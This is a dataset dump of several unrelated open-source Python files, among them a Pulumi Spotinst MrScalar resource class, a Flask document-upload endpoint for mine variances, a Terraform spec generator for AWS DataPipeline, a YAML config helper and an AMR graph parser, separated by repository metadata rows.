__props__.__dict__["core_scaling_down_policies"] = core_scaling_down_policies
__props__.__dict__["core_scaling_up_policies"] = core_scaling_up_policies
__props__.__dict__["core_unit"] = core_unit
__props__.__dict__["custom_ami_id"] = custom_ami_id
__props__.__dict__["description"] = description
__props__.__dict__["ebs_root_volume_size"] = ebs_root_volume_size
__props__.__dict__["ec2_key_name"] = ec2_key_name
__props__.__dict__["expose_cluster_id"] = expose_cluster_id
__props__.__dict__["instance_weights"] = instance_weights
__props__.__dict__["job_flow_role"] = job_flow_role
__props__.__dict__["keep_job_flow_alive"] = keep_job_flow_alive
__props__.__dict__["log_uri"] = log_uri
__props__.__dict__["managed_primary_security_group"] = managed_primary_security_group
__props__.__dict__["managed_replica_security_group"] = managed_replica_security_group
__props__.__dict__["master_ebs_block_devices"] = master_ebs_block_devices
__props__.__dict__["master_ebs_optimized"] = master_ebs_optimized
__props__.__dict__["master_instance_types"] = master_instance_types
__props__.__dict__["master_lifecycle"] = master_lifecycle
__props__.__dict__["master_target"] = master_target
__props__.__dict__["name"] = name
__props__.__dict__["output_cluster_id"] = output_cluster_id
__props__.__dict__["provisioning_timeout"] = provisioning_timeout
__props__.__dict__["region"] = region
__props__.__dict__["release_label"] = release_label
__props__.__dict__["repo_upgrade_on_boot"] = repo_upgrade_on_boot
__props__.__dict__["retries"] = retries
__props__.__dict__["scheduled_tasks"] = scheduled_tasks
__props__.__dict__["security_config"] = security_config
__props__.__dict__["service_access_security_group"] = service_access_security_group
__props__.__dict__["service_role"] = service_role
__props__.__dict__["steps_files"] = steps_files
__props__.__dict__["strategy"] = strategy
__props__.__dict__["tags"] = tags
__props__.__dict__["task_desired_capacity"] = task_desired_capacity
__props__.__dict__["task_ebs_block_devices"] = task_ebs_block_devices
__props__.__dict__["task_ebs_optimized"] = task_ebs_optimized
__props__.__dict__["task_instance_types"] = task_instance_types
__props__.__dict__["task_lifecycle"] = task_lifecycle
__props__.__dict__["task_max_size"] = task_max_size
__props__.__dict__["task_min_size"] = task_min_size
__props__.__dict__["task_scaling_down_policies"] = task_scaling_down_policies
__props__.__dict__["task_scaling_up_policies"] = task_scaling_up_policies
__props__.__dict__["task_unit"] = task_unit
__props__.__dict__["termination_policies"] = termination_policies
__props__.__dict__["termination_protected"] = termination_protected
__props__.__dict__["visible_to_all_users"] = visible_to_all_users
return MrScalar(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="additionalInfo")
def additional_info(self) -> pulumi.Output[Optional[str]]:
"""
This is meta information about third-party applications that third-party vendors use for testing purposes.
"""
return pulumi.get(self, "additional_info")
@property
@pulumi.getter(name="additionalPrimarySecurityGroups")
def additional_primary_security_groups(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of additional Amazon EC2 security group IDs for the master node.
"""
return pulumi.get(self, "additional_primary_security_groups")
@property
@pulumi.getter(name="additionalReplicaSecurityGroups")
def additional_replica_security_groups(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of additional Amazon EC2 security group IDs for the core and task nodes.
"""
return pulumi.get(self, "additional_replica_security_groups")
@property
@pulumi.getter
def applications(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarApplication']]]:
"""
A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
"""
return pulumi.get(self, "applications")
@property
@pulumi.getter(name="availabilityZones")
def availability_zones(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
List of AZs and their subnet Ids. See example above for usage.
"""
return pulumi.get(self, "availability_zones")
@property
@pulumi.getter(name="bootstrapActionsFiles")
def bootstrap_actions_files(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarBootstrapActionsFile']]]:
"""
Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
"""
return pulumi.get(self, "bootstrap_actions_files")
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> pulumi.Output[Optional[str]]:
"""
The MrScaler cluster id.
"""
return pulumi.get(self, "cluster_id")
@property
@pulumi.getter(name="configurationsFiles")
def configurations_files(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarConfigurationsFile']]]:
"""
Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
"""
return pulumi.get(self, "configurations_files")
@property
@pulumi.getter(name="coreDesiredCapacity")
def core_desired_capacity(self) -> pulumi.Output[Optional[int]]:
"""
amount of instances in core group.
"""
return pulumi.get(self, "core_desired_capacity")
@property
@pulumi.getter(name="coreEbsBlockDevices")
def core_ebs_block_devices(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarCoreEbsBlockDevice']]]:
"""
This determines the ebs configuration for your core group instances. Only a single block is allowed.
"""
return pulumi.get(self, "core_ebs_block_devices")
@property
@pulumi.getter(name="coreEbsOptimized")
def core_ebs_optimized(self) -> pulumi.Output[Optional[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "core_ebs_optimized")
@property
@pulumi.getter(name="coreInstanceTypes")
def core_instance_types(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The MrScaler instance types for the core nodes.
"""
return pulumi.get(self, "core_instance_types")
@property
@pulumi.getter(name="coreLifecycle")
def core_lifecycle(self) -> pulumi.Output[Optional[str]]:
"""
The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "core_lifecycle")
@property
@pulumi.getter(name="coreMaxSize")
def core_max_size(self) -> pulumi.Output[Optional[int]]:
"""
maximal amount of instances in core group.
"""
return pulumi.get(self, "core_max_size")
@property
@pulumi.getter(name="coreMinSize")
def core_min_size(self) -> pulumi.Output[Optional[int]]:
"""
The minimal amount of instances in core group.
"""
return pulumi.get(self, "core_min_size")
@property
@pulumi.getter(name="coreScalingDownPolicies")
def core_scaling_down_policies(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarCoreScalingDownPolicy']]]:
return pulumi.get(self, "core_scaling_down_policies")
@property
@pulumi.getter(name="coreScalingUpPolicies")
def core_scaling_up_policies(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarCoreScalingUpPolicy']]]:
return pulumi.get(self, "core_scaling_up_policies")
@property
@pulumi.getter(name="coreUnit")
def core_unit(self) -> pulumi.Output[Optional[str]]:
"""
Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
"""
return pulumi.get(self, "core_unit")
@property
@pulumi.getter(name="customAmiId")
def custom_ami_id(self) -> pulumi.Output[Optional[str]]:
"""
The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
"""
return pulumi.get(self, "custom_ami_id")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The MrScaler description.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="ebsRootVolumeSize")
def ebs_root_volume_size(self) -> pulumi.Output[Optional[int]]:
return pulumi.get(self, "ebs_root_volume_size")
@property
@pulumi.getter(name="ec2KeyName")
def ec2_key_name(self) -> pulumi.Output[Optional[str]]:
"""
The name of an Amazon EC2 key pair that can be used to ssh to the master node.
"""
return pulumi.get(self, "ec2_key_name")
@property
@pulumi.getter(name="exposeClusterId")
def expose_cluster_id(self) -> pulumi.Output[Optional[bool]]:
"""
Allow the `cluster_id` to set a provider output variable.
"""
return pulumi.get(self, "expose_cluster_id")
@property
@pulumi.getter(name="instanceWeights")
def instance_weights(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarInstanceWeight']]]:
"""
Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
"""
return pulumi.get(self, "instance_weights")
@property
@pulumi.getter(name="jobFlowRole")
def job_flow_role(self) -> pulumi.Output[Optional[str]]:
"""
The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
"""
return pulumi.get(self, "job_flow_role")
@property
@pulumi.getter(name="keepJobFlowAlive")
def keep_job_flow_alive(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies whether the cluster should remain available after completing all steps.
"""
return pulumi.get(self, "keep_job_flow_alive")
@property
@pulumi.getter(name="logUri")
def log_uri(self) -> pulumi.Output[Optional[str]]:
"""
The path to the Amazon S3 location where logs for this cluster are stored.
"""
return pulumi.get(self, "log_uri")
@property
@pulumi.getter(name="managedPrimarySecurityGroup")
def managed_primary_security_group(self) -> pulumi.Output[Optional[str]]:
"""
EMR Managed Security group that will be set to the primary instance group.
"""
return pulumi.get(self, "managed_primary_security_group")
@property
@pulumi.getter(name="managedReplicaSecurityGroup")
def managed_replica_security_group(self) -> pulumi.Output[Optional[str]]:
"""
EMR Managed Security group that will be set to the replica instance group.
"""
return pulumi.get(self, "managed_replica_security_group")
@property
@pulumi.getter(name="masterEbsBlockDevices")
def master_ebs_block_devices(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarMasterEbsBlockDevice']]]:
"""
This determines the ebs configuration for your master group instances. Only a single block is allowed.
"""
return pulumi.get(self, "master_ebs_block_devices")
@property
@pulumi.getter(name="masterEbsOptimized")
def master_ebs_optimized(self) -> pulumi.Output[Optional[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "master_ebs_optimized")
@property
@pulumi.getter(name="masterInstanceTypes")
def master_instance_types(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The MrScaler instance types for the master nodes.
"""
return pulumi.get(self, "master_instance_types")
@property
@pulumi.getter(name="masterLifecycle")
def master_lifecycle(self) -> pulumi.Output[Optional[str]]:
"""
The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "master_lifecycle")
@property
@pulumi.getter(name="masterTarget")
def master_target(self) -> pulumi.Output[Optional[int]]:
"""
Number of instances in the master group.
"""
return pulumi.get(self, "master_target")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The application name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="outputClusterId")
def output_cluster_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "output_cluster_id")
@property
@pulumi.getter(name="provisioningTimeout")
def provisioning_timeout(self) -> pulumi.Output[Optional['outputs.MrScalarProvisioningTimeout']]:
return pulumi.get(self, "provisioning_timeout")
@property
@pulumi.getter
def region(self) -> pulumi.Output[Optional[str]]:
"""
The MrScaler region.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter(name="releaseLabel")
def release_label(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "release_label")
@property
@pulumi.getter(name="repoUpgradeOnBoot")
def repo_upgrade_on_boot(self) -> pulumi.Output[Optional[str]]:
"""
Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
"""
return pulumi.get(self, "repo_upgrade_on_boot")
@property
@pulumi.getter
def retries(self) -> pulumi.Output[Optional[int]]:
"""
Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
"""
return pulumi.get(self, "retries")
@property
@pulumi.getter(name="scheduledTasks")
def scheduled_tasks(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarScheduledTask']]]:
"""
An array of scheduled tasks.
"""
return pulumi.get(self, "scheduled_tasks")
@property
@pulumi.getter(name="securityConfig")
def security_config(self) -> pulumi.Output[Optional[str]]:
"""
The name of the security configuration applied to the cluster.
"""
return pulumi.get(self, "security_config")
@property
@pulumi.getter(name="serviceAccessSecurityGroup")
def service_access_security_group(self) -> pulumi.Output[Optional[str]]:
"""
The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
"""
return pulumi.get(self, "service_access_security_group")
@property
@pulumi.getter(name="serviceRole")
def service_role(self) -> pulumi.Output[Optional[str]]:
"""
The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
"""
return pulumi.get(self, "service_role")
@property
@pulumi.getter(name="stepsFiles")
def steps_files(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarStepsFile']]]:
"""
Steps from S3.
"""
return pulumi.get(self, "steps_files")
@property
@pulumi.getter
def strategy(self) -> pulumi.Output[str]:
"""
The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
"""
return pulumi.get(self, "strategy")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarTag']]]:
"""
A list of tags to assign to the resource. You may define multiple tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="taskDesiredCapacity")
def task_desired_capacity(self) -> pulumi.Output[Optional[int]]:
"""
amount of instances in task group.
"""
return pulumi.get(self, "task_desired_capacity")
@property
@pulumi.getter(name="taskEbsBlockDevices")
def task_ebs_block_devices(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarTaskEbsBlockDevice']]]:
"""
This determines the ebs configuration for your task group instances. Only a single block is allowed.
"""
return pulumi.get(self, "task_ebs_block_devices")
@property
@pulumi.getter(name="taskEbsOptimized")
def task_ebs_optimized(self) -> pulumi.Output[Optional[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "task_ebs_optimized")
@property
@pulumi.getter(name="taskInstanceTypes")
def task_instance_types(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The MrScaler instance types for the task nodes.
"""
return pulumi.get(self, "task_instance_types")
@property
@pulumi.getter(name="taskLifecycle")
def task_lifecycle(self) -> pulumi.Output[Optional[str]]:
"""
The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "task_lifecycle")
@property
@pulumi.getter(name="taskMaxSize")
def task_max_size(self) -> pulumi.Output[Optional[int]]:
"""
maximal amount of instances in task group.
"""
return pulumi.get(self, "task_max_size")
@property
@pulumi.getter(name="taskMinSize")
def task_min_size(self) -> pulumi.Output[Optional[int]]:
"""
The minimal amount of instances in task group.
"""
return pulumi.get(self, "task_min_size")
@property
@pulumi.getter(name="taskScalingDownPolicies")
def task_scaling_down_policies(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarTaskScalingDownPolicy']]]:
return pulumi.get(self, "task_scaling_down_policies")
@property
@pulumi.getter(name="taskScalingUpPolicies")
def task_scaling_up_policies(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarTaskScalingUpPolicy']]]:
return pulumi.get(self, "task_scaling_up_policies")
@property
@pulumi.getter(name="taskUnit")
def task_unit(self) -> pulumi.Output[Optional[str]]:
"""
Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
"""
return pulumi.get(self, "task_unit")
@property
@pulumi.getter(name="terminationPolicies")
def termination_policies(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarTerminationPolicy']]]:
"""
Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
"""
return pulumi.get(self, "termination_policies")
@property
@pulumi.getter(name="terminationProtected")
def termination_protected(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
"""
return pulumi.get(self, "termination_protected")
@property
@pulumi.getter(name="visibleToAllUsers")
def visible_to_all_users(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "visible_to_all_users")
| 52.88346 | 338 | 0.679738 | 173,787 | 0.997337 | 0 | 0 | 161,702 | 0.927983 | 0 | 0 | 84,111 | 0.4827 |
6361591f69d6d58dde012798f78f229535fcd8bf | 4,189 | py | Python | python-backend/app/api/mines/variances/resources/variance_document_upload.py | ActionAnalytics/mds | 7ac61b0b73b1d310db7dcf2d830b5746b851fe4a | [
"Apache-2.0"
] | null | null | null | python-backend/app/api/mines/variances/resources/variance_document_upload.py | ActionAnalytics/mds | 7ac61b0b73b1d310db7dcf2d830b5746b851fe4a | [
"Apache-2.0"
] | null | null | null | python-backend/app/api/mines/variances/resources/variance_document_upload.py | ActionAnalytics/mds | 7ac61b0b73b1d310db7dcf2d830b5746b851fe4a | [
"Apache-2.0"
] | null | null | null | import base64
import requests
from werkzeug.exceptions import BadRequest, NotFound
from flask import request, current_app, Response
from flask_restplus import Resource
from app.extensions import api
from ...mine.models.mine import Mine
from ....documents.mines.models.mine_document import MineDocument
from ....documents.variances.models.variance import VarianceDocumentXref
from ....utils.access_decorators import (requires_any_of, MINE_CREATE,
MINESPACE_PROPONENT)
from ....utils.resources_mixins import UserMixin, ErrorMixin
from app.api.utils.custom_reqparser import CustomReqparser
from app.api.mines.mine_api_models import VARIANCE_MODEL
from app.api.variances.models.variance import Variance
class MineVarianceDocumentUploadResource(Resource, UserMixin, ErrorMixin):
@api.doc(description='Request a document_manager_guid for uploading a document')
@requires_any_of([MINE_CREATE, MINESPACE_PROPONENT])
def post(self, mine_guid, variance_guid):
metadata = self._parse_request_metadata()
if not metadata or not metadata.get('filename'):
raise BadRequest('Filename not found in request metadata header')
# Save file
mine = Mine.find_by_mine_guid(mine_guid)
document_name = metadata.get('filename')
data = {
'folder': f'mines/{mine.mine_guid}/variances',
'pretty_folder': f'mines/{mine.mine_no}/variances',
'filename': document_name
}
document_manager_URL = f'{current_app.config["DOCUMENT_MANAGER_URL"]}/document-manager'
resp = requests.post(
url=document_manager_URL,
headers={key: value
for (key, value) in request.headers if key != 'Host'},
data=data,
cookies=request.cookies,
)
response = Response(str(resp.content), resp.status_code, resp.raw.headers.items())
return response
@api.doc(
description='Associate an uploaded file with a variance.',
params={
'mine_guid': 'guid for the mine with which the variance is associated',
'variance_guid': 'GUID for the variance to which the document should be associated'
})
@api.marshal_with(VARIANCE_MODEL, code=200)
@requires_any_of([MINE_CREATE, MINESPACE_PROPONENT])
def put(self, mine_guid, variance_guid):
parser = CustomReqparser()
# Arguments required by MineDocument
parser.add_argument('document_name', type=str, required=True)
parser.add_argument('document_manager_guid', type=str, required=True)
parser.add_argument('variance_document_category_code', type=str, required=True)
variance = Variance.find_by_variance_guid(variance_guid)
if not variance:
raise NotFound('Unable to fetch variance.')
data = parser.parse_args()
document_name = data.get('document_name')
document_manager_guid = data.get('document_manager_guid')
# Register new file upload
mine_doc = MineDocument(
mine_guid=mine_guid,
document_manager_guid=document_manager_guid,
document_name=document_name)
if not mine_doc:
raise BadRequest('Unable to register uploaded file as document')
# Associate Variance & MineDocument to create Variance Document
# Add fields specific to Variance Documents
mine_doc.save()
variance_doc = VarianceDocumentXref(
mine_document_guid=mine_doc.mine_document_guid,
variance_id=variance.variance_id,
variance_document_category_code=data.get('variance_document_category_code'))
variance.documents.append(variance_doc)
variance.save()
return variance
def _parse_request_metadata(self):
request_metadata = request.headers.get("Upload-Metadata")
metadata = {}
if not request_metadata:
return metadata
for key_value in request_metadata.split(","):
(key, value) = key_value.split(" ")
metadata[key] = base64.b64decode(value).decode("utf-8")
return metadata
| 39.518868 | 95 | 0.681308 | 3,444 | 0.822153 | 0 | 0 | 2,973 | 0.709716 | 0 | 0 | 914 | 0.21819 |
63625b735919dfc4cb5cbf688dbf97a5a8eb7672 | 2,709 | py | Python | src/generated-spec/data_pipeline.py | wheerd/cloudformation-to-terraform | 5411b33293e1f7d7673bb5d4cb52ff0537240db3 | [
"MIT"
] | null | null | null | src/generated-spec/data_pipeline.py | wheerd/cloudformation-to-terraform | 5411b33293e1f7d7673bb5d4cb52ff0537240db3 | [
"MIT"
] | null | null | null | src/generated-spec/data_pipeline.py | wheerd/cloudformation-to-terraform | 5411b33293e1f7d7673bb5d4cb52ff0537240db3 | [
"MIT"
] | null | null | null | from . import *
class AWS_DataPipeline_Pipeline_ParameterAttribute(CloudFormationProperty):
def write(self, w):
with w.block("parameter_attribute"):
self.property(w, "Key", "key", StringValueConverter())
self.property(w, "StringValue", "string_value", StringValueConverter())
class AWS_DataPipeline_Pipeline_PipelineTag(CloudFormationProperty):
def write(self, w):
with w.block("pipeline_tag"):
self.property(w, "Key", "key", StringValueConverter())
self.property(w, "Value", "value", StringValueConverter())
class AWS_DataPipeline_Pipeline_ParameterObject(CloudFormationProperty):
def write(self, w):
with w.block("parameter_object"):
self.repeated_block(w, "Attributes", AWS_DataPipeline_Pipeline_ParameterAttribute)
self.property(w, "Id", "id", StringValueConverter())
class AWS_DataPipeline_Pipeline_ParameterValue(CloudFormationProperty):
def write(self, w):
with w.block("parameter_value"):
self.property(w, "Id", "id", StringValueConverter())
self.property(w, "StringValue", "string_value", StringValueConverter())
class AWS_DataPipeline_Pipeline_Field(CloudFormationProperty):
def write(self, w):
with w.block("field"):
self.property(w, "Key", "key", StringValueConverter())
self.property(w, "RefValue", "ref_value", StringValueConverter())
self.property(w, "StringValue", "string_value", StringValueConverter())
class AWS_DataPipeline_Pipeline_PipelineObject(CloudFormationProperty):
def write(self, w):
with w.block("pipeline_object"):
self.repeated_block(w, "Fields", AWS_DataPipeline_Pipeline_Field)
self.property(w, "Id", "id", StringValueConverter())
self.property(w, "Name", "name", StringValueConverter())
class AWS_DataPipeline_Pipeline(CloudFormationResource):
cfn_type = "AWS::DataPipeline::Pipeline"
tf_type = "aws_datapipeline_pipeline"
ref = "id"
attrs = {}
def write(self, w):
with self.resource_block(w):
self.property(w, "Activate", "activate", BasicValueConverter()) # TODO: Probably not the correct mapping
self.property(w, "Description", "description", StringValueConverter())
self.property(w, "Name", "name", StringValueConverter())
self.repeated_block(w, "ParameterObjects", AWS_DataPipeline_Pipeline_ParameterObject) # TODO: Probably not the correct mapping
self.repeated_block(w, "ParameterValues", AWS_DataPipeline_Pipeline_ParameterValue) # TODO: Probably not the correct mapping
self.repeated_block(w, "PipelineObjects", AWS_DataPipeline_Pipeline_PipelineObject) # TODO: Probably not the correct mapping
self.repeated_block(w, "PipelineTags", AWS_DataPipeline_Pipeline_PipelineTag)
| 42.328125 | 132 | 0.741602 | 2,671 | 0.985973 | 0 | 0 | 0 | 0 | 0 | 0 | 640 | 0.23625 |
63644d194b8d4b983a5942a1f10e9cd725bc6bed | 2,295 | py | Python | rl_algorithms/utils/config.py | medipixel/rl_algorithms | 96bceb9d65c6d66fca59c4115cd7947f87b87ebc | [
"MIT"
] | 466 | 2019-02-14T15:06:01.000Z | 2022-03-28T03:08:10.000Z | rl_algorithms/utils/config.py | blakcapple/rl_algorithms | 96bceb9d65c6d66fca59c4115cd7947f87b87ebc | [
"MIT"
] | 138 | 2019-02-15T05:44:17.000Z | 2021-12-15T06:00:55.000Z | rl_algorithms/utils/config.py | medipixel/reinforcement_learning_examples | c5f7d1d60dcefb3050d75c5c657207183bd8db65 | [
"MIT"
] | 86 | 2019-02-25T15:52:29.000Z | 2022-03-08T06:30:36.000Z | import collections.abc as collections_abc
import os.path as osp
from addict import Dict
import yaml
class ConfigDict(Dict):
def __missing__(self, name):
raise KeyError(name)
def __getattr__(self, name):
try:
value = super(ConfigDict, self).__getattr__(name)
except KeyError:
ex = AttributeError(
"'{}' object has no attribute '{}'".format(
self.__class__.__name__, name
)
)
except Exception as e:
ex = e
else:
return value
raise ex
def __setitem__(self, name, value):
if isinstance(value, dict):
value = ConfigDict(value)
super(ConfigDict, self).__setitem__(name, value)
def add_args(parser, cfg, prefix=""):
for k, v in cfg.items():
if isinstance(v, str):
parser.add_argument("--" + prefix + k)
elif isinstance(v, int):
parser.add_argument("--" + prefix + k, type=int)
elif isinstance(v, float):
parser.add_argument("--" + prefix + k, type=float)
elif isinstance(v, bool):
parser.add_argument("--" + prefix + k, action="store_true")
elif isinstance(v, dict):
add_args(parser, v, k + ".")
elif isinstance(v, collections_abc.Iterable):
parser.add_argument("--" + prefix + k, type=type(v[0]), nargs="+")
else:
print("connot parse key {} of type {}".format(prefix + k, type(v)))
return parser
class YamlConfig:
"""Manager of ConfigDict from yaml."""
def __init__(self, config_paths: dict):
"""Make ConfigDict from yaml path."""
self.cfg = ConfigDict()
for key, path in config_paths.items():
self.cfg[key] = self._yaml_to_config_dict(path)
@staticmethod
def _yaml_to_config_dict(path: str) -> ConfigDict:
"""Return ConfigDict from yaml."""
try:
with open(path) as f:
data = yaml.load(f, Loader=yaml.FullLoader)
except FileNotFoundError:
with open(osp.expanduser(path)) as f:
data = yaml.load(f, Loader=yaml.FullLoader)
return ConfigDict(data)
def get_config_dict(self):
return self.cfg
| 30.6 | 79 | 0.568192 | 1,419 | 0.618301 | 0 | 0 | 394 | 0.171678 | 0 | 0 | 216 | 0.094118 |
63645da097f4e87f2edd1db2b89287cf483492a1 | 7,748 | py | Python | elit/components/amr/amr_parser/amr_graph.py | emorynlp/el | dbe73d1ce6f2296a64fb013775d2691ae1ed90d4 | [
"Apache-2.0"
] | 40 | 2017-02-27T20:16:44.000Z | 2022-03-25T04:58:01.000Z | elit/components/amr/amr_parser/amr_graph.py | emorynlp/el | dbe73d1ce6f2296a64fb013775d2691ae1ed90d4 | [
"Apache-2.0"
] | 12 | 2017-02-16T23:50:38.000Z | 2022-01-19T21:29:59.000Z | elit/components/amr/amr_parser/amr_graph.py | emorynlp/levi-graph-amr-parser | f71f1056c13181b8db31d6136451fb8d57114819 | [
"Apache-2.0"
] | 6 | 2017-05-05T08:02:18.000Z | 2021-11-03T23:47:23.000Z | # MIT License
#
# Copyright (c) 2020 Deng Cai
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import random
import re
from collections import defaultdict
from toposort import toposort, CircularDependencyError
from elit.components.amr.amr_parser.data import REL
number_regexp = re.compile(r'^-?(\d)+(\.\d+)?$')
abstract_regexp0 = re.compile(r'^([A-Z]+_)+\d+$')
abstract_regexp1 = re.compile(r'^\d0*$')
discard_regexp = re.compile(r'^n(\d+)?$')
attr_value_set = set(['-', '+', 'interrogative', 'imperative', 'expressive'])
def _is_attr_form(x):
return (x in attr_value_set or x.endswith('_') or number_regexp.match(x) is not None)
def _is_abs_form(x):
return (abstract_regexp0.match(x) is not None or abstract_regexp1.match(x) is not None)
def is_attr_or_abs_form(x):
return _is_attr_form(x) or _is_abs_form(x)
def need_an_instance(x):
return (not _is_attr_form(x) or (abstract_regexp0.match(x) is not None))
class AMRGraph(object):
def __init__(self, smatch_amr):
# transform amr from original smatch format into our own data structure
instance_triple, attribute_triple, relation_triple = smatch_amr.get_triples()
self.root = smatch_amr.root
self.nodes = set()
self.edges = dict()
self.reversed_edges = dict()
self.undirected_edges = dict()
self.name2concept = dict()
# will do some adjustments
self.abstract_concepts = dict()
for _, name, concept in instance_triple:
if is_attr_or_abs_form(concept):
if _is_abs_form(concept):
self.abstract_concepts[name] = concept
else:
# print('bad concept', _, name, concept)
pass
self.name2concept[name] = concept
self.nodes.add(name)
for rel, concept, value in attribute_triple:
if rel == 'TOP':
continue
# discard some empty names
if rel == 'name' and discard_regexp.match(value):
continue
# abstract concept can't have an attribute
if concept in self.abstract_concepts:
# print(rel, self.abstract_concepts[concept], value, "abstract concept cannot have an attribute")
continue
name = "%s_attr_%d" % (value, len(self.name2concept))
if not _is_attr_form(value):
if _is_abs_form(value):
self.abstract_concepts[name] = value
else:
# print('bad attribute', rel, concept, value)
continue
self.name2concept[name] = value
self._add_edge(rel, concept, name)
for rel, head, tail in relation_triple:
self._add_edge(rel, head, tail)
# lower concept
for name in self.name2concept:
v = self.name2concept[name]
if not _is_abs_form(v):
v = v.lower()
self.name2concept[name] = v
def __len__(self):
return len(self.name2concept)
def _add_edge(self, rel, src, des):
self.nodes.add(src)
self.nodes.add(des)
self.edges[src] = self.edges.get(src, []) + [(rel, des)]
self.reversed_edges[des] = self.reversed_edges.get(des, []) + [(rel, src)]
self.undirected_edges[src] = self.undirected_edges.get(src, []) + [(rel, des)]
self.undirected_edges[des] = self.undirected_edges.get(des, []) + [(rel + '_reverse_', src)]
def root_centered_sort(self, rel_order=None, shuffle=True):
queue = [self.root]
visited = set(queue)
step = 0
while len(queue) > step:
src = queue[step]
step += 1
if src not in self.undirected_edges:
continue
if shuffle:
random.shuffle(self.undirected_edges[src])
if rel_order is not None:
# Do some random thing here for performance enhancement
if shuffle and random.random() < 0.5:
self.undirected_edges[src].sort(
key=lambda x: -rel_order(x[0]) if (x[0].startswith('snt') or x[0].startswith('op')) else -1)
else:
self.undirected_edges[src].sort(key=lambda x: -rel_order(x[0]))
for rel, des in self.undirected_edges[src]:
if des in visited:
continue
else:
queue.append(des)
visited.add(des)
not_connected = len(queue) != len(self.nodes)
assert (not not_connected)
name2pos = dict(zip(queue, range(len(queue))))
visited = set()
edge = []
for x in queue:
if x not in self.undirected_edges:
continue
for r, y in self.undirected_edges[x]:
if y in visited:
r = r[:-9] if r.endswith('_reverse_') else r + '_reverse_'
edge.append((name2pos[x], name2pos[y], r)) # x -> y: r
visited.add(x)
return [self.name2concept[x] for x in queue], edge, not_connected
